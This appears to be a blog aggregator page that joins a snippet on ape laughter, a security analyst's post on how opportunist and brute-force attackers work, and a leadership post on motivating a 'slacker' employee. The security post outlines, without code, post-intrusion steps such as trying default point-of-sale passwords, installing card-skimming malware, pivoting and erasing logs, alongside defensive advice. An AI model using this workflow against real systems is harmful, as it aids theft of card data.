An Aggregator for Blogs About Social Engineering and Related Fields
Apes often make weird sounds when they’re tickled, and some researchers now say these pants and hoots truly are related to human laughter.
That’s the conclusion of a new study in the journal Current Biology that analyzed the “tickle-induced vocalizations” of infant and juvenile apes as well as human infants.
Crimes of opportunity lead the average hacker to valuable data. 
By: Steve SnelgroveYou might think hackers selectively pick each business they hack. While this may be true in high profile or hacktivism cases, I estimate 90% of hacking is done based on a system’s general lack of security. Hackers don’t think, “Today I’m going to hack Acme Hardware across the street.” They scan for the most vulnerable system and start digging.To defend against attacks, it is important to understand that hackers have different motivations and capabilities.The Opportunist Hacker
A crime of opportunityThese hackers stay up-to-date on security news. Once a vulnerability is made public, it’s fairly easy to conduct a large-scale network scan for systems which exhibit symptoms of the vulnerability. After the hacker gets the list of vulnerable machines, he will do additional research on the vulnerability and attempt to enter the system. Once inside, it is often easy to pivot and reach other, less hardened machines.A great example of opportunist hackers in action arose when news of the Heartbleed vulnerability was released in April 2014. The vulnerability was publically exposed on many news publications. Very shortly thereafter, hackers scanned the Internet for looking machines using OpenSSL, and then attempted to exploit that vulnerability and enter the system. Piece of cake.SEE ALSO: PCI 3.1, Stop Using SSL and Early TLS ImmediatelyBut hackers don’t necessarily require huge newsworthy vulnerabilities in order to hack. There are thousands of other publically-known vulnerabilities they could take advantage of. For example, website forms often have validation flaws. An attacker may submit potentially malicious data on a form, which then might be echoed back to the user’s browser and rendered to the screen. The screen displays a mix of server content and the attacker’s malicious data. This could result in unsuspecting users being redirected to another site where credentials or session information might be captured.Does the hacker know which business or person he’s hacking? No. And he doesn’t care. He’s attacking a system because it’s vulnerable. Once the vulnerability is identified, the hacker will then attempt to profit from the exposure.How do I defend against this attack?The obvious defense against the public vulnerability attack is to scan your systems in an attempt to discover vulnerabilities beforehand. Keep up-to-date on security news. Partner with a company that keeps abreast of publicly disclosed vulnerabilities. Regularly maintain and update your systems.If a vulnerability similar to Heartbleed is released, do everything in your power to close the vulnerability ASAP. Do your best to maintain updates on all other operating systems, browsers, and servers to avoid the possibility of being a victim of a zero-day attack. The Layabout Hacker
Brute forcingSomewhat less effective, but still pervasive, are brute force attacks. In these attacks, attackers control an army of computers infected with malware (known as botnets or zombie computers). The attacker is able to control this network of computers, and these do the attacker’s dirty work for them.The attacker uses botnets to access systems by guessing usernames and passwords in millions of combinations until the right combination is guessed. It’s not very effective. But, as my dad always said, “even a blind squirrel will find a nut every once and a while.”Hackers use botnets so each hack attempt is nearly impossible to trace back to the actual hacker.
How do I defend against this attack?The two best ways to avoid this attack is by monitoring your logs and regularly creating new passwords.If a botnet tries to access your system through a brute force attack, your logs should record these actions. If your logs record 1,000’s of failed login attempts on your system, you’re probably being attacked.The reason brute force attacks work so well is because millions of user credentials (usernames and passwords) have been dumped online in publicly available lists. Password lists are effective because the majority of people do not change their passwords, and use the same passwords on multiple sites/systems. To avoid this attack, change your personal and business passwords every 90 days, and never reuse passwords.SEE ALSO: Vendor-Supplied Defaults Are A Serious ThreatHackers have different motivations and capabilities. But these are their main methods.
TweetWhat do hackers do after they get into a system?Now the hacker starts prospecting. Remember, before this point the hacker still doesn’t know if he’s hacked a business or a personal computer. Now, he looks for evidence that the system is doing commerce, which means credit cards, healthcare information, or other valuable data might be present. To find this data, he starts running keyword searches on the file systems and memory of the system.For example, if his keyword searches discover that the system he’s hacked is a Micros system, he knows he has gained access to a business that accepts credit cards. (Micros is a point of sale software used by many restaurants and hotels.) He will probably try Micros default passwords to try to get into their server and thus expand the range of the attack.Install malwareIf the hacker is successful in breaching the point of sale system, he can possibly install malware. The whole point of malware is to gain access to valuable and sensitive information, such as credit card numbers, early on in the data processing stream, and attempt to divert this sensitive information so cybercriminals can reproduce cards or sell the stolen data on the black market.Depending on the malware installed, every single customer credit card transaction made on that computer (and perhaps on the entire network) could be at risk.PivotBy now, the hacker in this scenario has probably filtered through enough company data to realize who he’s hacked.Perhaps the hacker has managed to attack and gain access to a national business with a chain of stores. If he finds remnant data on the system that includes the IP addresses of other chain locations, that chain will be in some serious trouble as these chain locations may have less security measures in place, and access to these associated networks could provide valuable information to the attacker.Remnant data left on systems does occur in real world examples. In a forensic investigation my colleague David Ellis conducted, a point-of-sale equipment installer left a partial client list on each and every point-of-sale system he had installed during that year. Some 28 businesses were hacked because of the poor security awareness of that careless installer.Leave no traceAt this point, it’s time for the hacker to get out of the hacked system. Most hackers cover their tracks to avoid detection. They encrypt card data before transferring it out of a system, erase or modify security logs, and run malware from RAM instead of the hard drive, which often goes undetected by most anti-virus software.SEE ALSO: Hacking Trends of 2014Hackers don’t care who you are. They just care how rich you can make them.Read about 5 commonly overlooked security errors for tips to avoid being attacked.Steven Snelgrove (CISSP) has been a Security Analyst at SecurityMetrics for over 7 years. Since 1980, Snelgrove has worked in the computer and telecommunications industry, and has familiarity with programming, software engineering, and network security. His current responsibilities includes the manual assessment of web applications and corporate networks, conducting ethical hacking to analyze security architecture, and consulting with organizations to help remediate issues. Snelgrove received a degree in Computer Science from Brigham Young University, and holds a CISSP (Certified Information Systems Security Professional) certification.
This week’s guest post is from Mike Figliuolo, the co-author of Lead Inside the Box: How Smart Leaders Guide Their Teams to Exceptional Results and the author of One Piece of Paper: The Simple Approach to Powerful, Personal Leadership. He’s the managing director of thoughtLEADERS, LLC – a leadership development training firm. An honor graduate from West Point, Mike served in the U.S. Army as a combat arms officer. Before founding his own company, he was an assistant professor at Duke University, a consultant at McKinsey & Co., and an executive at Capital One and Scotts Miracle-Gro. Mike regularly writes about leadership on the thoughtLEADERS Blog. His latest book, Lead Inside the Box: How Smart Leaders Guide Their Teams to Exceptional Results, has just come out and you can get your copy by clicking here. On a more personal note, Mike has been a good friend for many years and has generously shared his blogging expertise with me. 
Brian Ahearn, CMCT® Chief Influence Officer influencePEOPLE Helping You Learn to Hear “Yes”.The Secret to Motivating a Slacker on Your TeamDave has a great résumé with the right education and expertise from brand name schools and employers. When he accepted your job offer, you felt like you made one of the best hires of your career.Since Dave got the job, however, his talents haven’t translated into the results you expected. He’s a smart guy with great communications skills – at least his verbal communication skills. He’s outspoken in team meetings and has many ideas, most of which seem to have potential. Interestingly enough, however, those ideas relate to other peoples’ responsibilities. Dave’s willingness to comment on how others are doing or not doing their jobs is drawing complaints from your team. He has much less to say about his own area.You hate the thought of losing someone as talented as Dave, but his lack of results is alarming. His teammates have picked up his slack. You’ve dedicated more of your leadership capital than you’d like harping on him to get his work done. There’s no doubt that Dave is a “Slacker.”Approaches for Leading a SlackerLeading Slackers requires you to “Unlock Motivation” within them. Slackers have the capability to do their jobs well. If they applied themselves, Slackers could be Exemplars on your team. Turning a Slacker around reduces the team conflict they create when they talk about everyone else’s work instead of doing their own. To be sure you’ve got a Slacker on your hands, assess their performance and see if they’re delivering the results you expect.To turn Slackers around, first let them know their behavior isn’t acceptable. If they’ve avoided deadlines in the past, give them a real deadline to hit or face the consequences. Connect with your HR representative to start the performance improvement plan process. Document the expectations for the Slackers’ role, their performance against those objectives, and the specific goals they need to accomplish.Set deadlines for completing their performance improvement plan and keeping their job. Make it clear that delivery of results is a condition of their employment. You’re not looking to threaten them – you’re merely explaining the cold, hard facts of their situation. Coach them that being smart isn’t enough. Reassure them you believe they have the ability to do the job – if they set their mind to it. Provide them a picture of what success could look like for them.The painful first conversation with Slackers might be enough to turn them around. Other times they say they’ll improve but they never do. That behavior requires you to escalate the situation and put them on a formal performance improvement plan.After putting your Slackers on a formal performance improvement plan, have a frank discussion with them about how they want to rectify the situation. Don’t limit the discussion to their role on your team – discuss their career aspirations too. Let them know if they plan to keep slacking by relying on their smarts and reputation to get them through, they’re going to have a performance crisis that will be hard to recover from. If they don’t change their behavior, it will kill their career at some point.If the combination of being put on a performance improvement plan and getting your frank assessment can’t motivate them to behave differently, ask them what it will take to get them to change. If they’re not interested in helping themselves, you can’t do it for them. These are potentially high risk, high return leadership investments.Slackers have a decision to make that will determine your approach to leading them. If putting them on a performance improvement plan gets through to them, find the root cause of their problem. All that’s holding them back is their motivation. They could be bored with their work. Maybe they lack the skills required to plan their work and manage their time. Perhaps someone else on the team is stealing credit for their work. Your discussion about root causes could provide you insights on how committed they are to change. If they’re not going to work hard in their current role, help them find their next one. Work with them, in consultation with your HR team, to see what kind of referral you can give them. For external referrals, you can point to the Slackers’ strengths. Leave it up to them to explain why they’re leaving their role.
Mike